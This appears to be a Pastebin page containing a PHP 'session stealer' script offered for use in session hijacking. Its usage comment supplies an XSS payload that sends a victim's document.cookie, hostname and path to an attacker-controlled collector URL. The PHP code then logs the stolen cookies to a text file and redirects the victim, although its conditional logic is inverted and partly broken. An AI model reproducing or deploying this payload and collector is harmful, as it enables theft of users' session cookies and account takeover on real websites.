Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Session Hijacking XSS
- Session Stealer
- =======================
- Usage:
- <script type="text/javascript">
- var url = 'http://yourhost/session-stealer.php'+'?c='+document.cookie+'&w='+document.location.hostname+'&p='+document.location.pathname;
- document.location = url;
- </script>
- */
- $cook = $_GET ['c' ];
- $web = $_GET ['w' ] ;
- $path = $_GET ['p' ];
- if (! empty( $cook))
- {
- // IF COOKIE EMPTY REDIRECT TO GOOGLE
- ?> <meta content='0;url=https://www.google.com/' http-equiv='refresh'/> <?php
- break ;
- }
- else
- {
- $fp = fopen ('cookie-got.txt' , 'a' );
- fwrite ($fp , 'Web : '. $web . '\nPath : ' .
- $path . '\nCookie : '. $cook. '\n====================\n' ) ;
- fclose ($fp ) ;
- ?> <meta content='0;url=http:// <?php echo
- $web ;?> ' http-equiv='refresh'/> <?php
- break ;
- }
- ?>
Add Comment
Please, Sign In to add comment